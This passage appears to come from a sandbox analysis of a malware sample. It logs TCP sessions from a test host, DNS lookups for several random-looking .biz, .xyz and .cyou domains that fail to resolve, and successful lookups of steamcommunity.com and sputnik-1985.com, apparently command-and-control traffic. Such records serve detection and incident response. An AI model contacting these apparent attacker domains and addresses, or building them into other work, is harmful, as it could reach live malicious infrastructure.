                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.921536922 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.921641111 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.924993992 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.925000906 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.925307989 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.993999004 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.019113064 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.059333086 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.441050053 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.441072941 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.441078901 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.441116095 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.441123962 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.441129923 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.441160917 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.441164970 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.441198111 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.441230059 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.545665979 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.545691967 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.545803070 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.545816898 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.545871973 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.550990105 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.551086903 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.551090002 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.551172972 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.552843094 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.552861929 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.552874088 CET49815443192.168.2.9104.102.49.254
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.552880049 CET44349815104.102.49.254192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.606272936 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.606318951 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.606374025 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.606618881 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.606631041 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.086246014 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.086323023 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.088036060 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.088047028 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.088299036 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.089379072 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.089391947 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.089461088 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.524024963 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.524131060 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.524379969 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.524379969 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.524451971 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.524477005 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.692883015 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.692948103 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.693015099 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.693422079 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.693434000 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.162465096 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.162537098 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.163784027 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.163795948 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.164053917 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.165143967 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.165189028 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.165214062 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650327921 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650378942 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650418043 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650465012 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650486946 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650557041 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650691986 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650764942 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650794029 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650841951 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650846958 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650898933 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.651176929 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.651446104 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.651479006 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.651529074 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.651534081 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.651581049 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.655092001 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.655183077 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.655260086 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.655267000 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.697127104 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.740025043 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.740153074 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.740222931 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.740406990 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.740425110 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.740436077 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.740441084 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.240552902 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.240643978 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.240768909 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.264667988 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.264720917 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.739645004 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.739731073 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.740943909 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.740966082 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.741230011 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.742522001 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.742660046 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.742706060 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.309870005 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.309969902 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.310051918 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.310197115 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.310242891 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.507956982 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.507997990 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.508136034 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.508425951 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.508460999 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.982547045 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.982728004 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.983993053 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.984019995 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.984354973 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.985618114 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.985657930 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.985692978 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.985795975 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.985804081 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.496323109 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.496402979 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.497273922 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.497273922 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.806499958 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.806529045 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.899338961 CET49861443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.899378061 CET44349861104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.900413036 CET49861443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.900413036 CET49861443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.900449038 CET44349861104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:55.356753111 CET44349861104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:55.356823921 CET49861443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:55.358000040 CET49861443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:55.358010054 CET44349861104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:55.358243942 CET44349861104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:55.359296083 CET49861443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:55.359297037 CET49861443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:55.359349966 CET44349861104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:55.359411001 CET49861443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:55.359421015 CET44349861104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:55.994695902 CET44349861104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:55.994818926 CET44349861104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:55.994925022 CET49861443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:55.995093107 CET49861443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:55.995110989 CET44349861104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:56.275352955 CET49872443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:56.275451899 CET44349872104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:56.275546074 CET49872443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:56.275846958 CET49872443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:56.275902987 CET44349872104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:56.745995045 CET44349872104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:56.746109962 CET49872443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:56.747239113 CET49872443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:56.747267962 CET44349872104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:56.747550964 CET44349872104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:56.748708010 CET49872443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:56.748786926 CET49872443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:56.748800039 CET44349872104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:57.480906010 CET44349872104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:57.481025934 CET44349872104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:57.481102943 CET49872443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:57.481283903 CET49872443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:57.481303930 CET44349872104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:57.586173058 CET49878443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:57.586200953 CET44349878104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:57.586294889 CET49878443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:57.586585999 CET49878443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:57.586601973 CET44349878104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.052407980 CET44349878104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.052478075 CET49878443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.053901911 CET49878443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.053910971 CET44349878104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.054143906 CET44349878104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.055190086 CET49878443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.055298090 CET49878443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.055304050 CET44349878104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.540321112 CET44349878104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.540426970 CET44349878104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.540515900 CET49878443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.540574074 CET49878443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.540596962 CET44349878104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.575709105 CET49889443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.575793982 CET44349889104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.575896025 CET49889443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.576195955 CET49889443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:58.576234102 CET44349889104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:59.062680006 CET44349889104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:59.062809944 CET49889443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:59.064142942 CET49889443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:59.064162016 CET44349889104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:59.064524889 CET44349889104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:59.067028999 CET49889443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:59.067069054 CET49889443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:59.067147970 CET44349889104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:59.546797991 CET44349889104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:59.546902895 CET44349889104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:59.546972036 CET49889443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:59.547111034 CET49889443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:59.547152996 CET44349889104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:59.547183990 CET49889443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:59.547199965 CET44349889104.21.96.1192.168.2.9

                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.139605999 CET5455453192.168.2.91.1.1.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.150283098 CET53545541.1.1.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.152069092 CET5238553192.168.2.91.1.1.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.163085938 CET53523851.1.1.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.166347027 CET5285753192.168.2.91.1.1.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.178050995 CET53528571.1.1.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.180277109 CET5904753192.168.2.91.1.1.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.189517975 CET53590471.1.1.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.191792965 CET6265753192.168.2.91.1.1.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.200459003 CET53626571.1.1.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.202766895 CET5478953192.168.2.91.1.1.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.216598034 CET53547891.1.1.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.218852043 CET5482653192.168.2.91.1.1.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.227627039 CET53548261.1.1.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.229944944 CET5347353192.168.2.91.1.1.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.238814116 CET53534731.1.1.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.240914106 CET5999953192.168.2.91.1.1.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.249902964 CET53599991.1.1.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.251861095 CET6117853192.168.2.91.1.1.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.258569956 CET53611781.1.1.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.569968939 CET5253953192.168.2.91.1.1.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.605536938 CET53525391.1.1.1192.168.2.9

                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.139605999 CET192.168.2.91.1.1.10x701eStandard query (0)spellshagey.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.152069092 CET192.168.2.91.1.1.10xbc7eStandard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.166347027 CET192.168.2.91.1.1.10xb743Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.180277109 CET192.168.2.91.1.1.10xbc92Standard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.191792965 CET192.168.2.91.1.1.10x9683Standard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.202766895 CET192.168.2.91.1.1.10x1374Standard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.218852043 CET192.168.2.91.1.1.10xe6ddStandard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.229944944 CET192.168.2.91.1.1.10x7b84Standard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.240914106 CET192.168.2.91.1.1.10xbc98Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.251861095 CET192.168.2.91.1.1.10x6673Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.569968939 CET192.168.2.91.1.1.10xd600Standard query (0)sputnik-1985.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                  Jan 10, 2025 11:47:29.928081989 CET1.1.1.1192.168.2.90x8036No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:29.928081989 CET1.1.1.1192.168.2.90x8036No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:29.928081989 CET1.1.1.1192.168.2.90x8036No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.150283098 CET1.1.1.1192.168.2.90x701eName error (3)spellshagey.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.163085938 CET1.1.1.1192.168.2.90xbc7eName error (3)immureprech.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.178050995 CET1.1.1.1192.168.2.90xb743Name error (3)deafeninggeh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.189517975 CET1.1.1.1192.168.2.90xbc92Name error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.200459003 CET1.1.1.1192.168.2.90x9683Name error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.216598034 CET1.1.1.1192.168.2.90x1374Name error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.227627039 CET1.1.1.1192.168.2.90xe6ddName error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.238814116 CET1.1.1.1192.168.2.90x7b84Name error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.249902964 CET1.1.1.1192.168.2.90xbc98Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:48.258569956 CET1.1.1.1192.168.2.90x6673No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.605536938 CET1.1.1.1192.168.2.90xd600No error (0)sputnik-1985.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.605536938 CET1.1.1.1192.168.2.90xd600No error (0)sputnik-1985.com104.21.112.1A (IP address)IN (0x0001)false
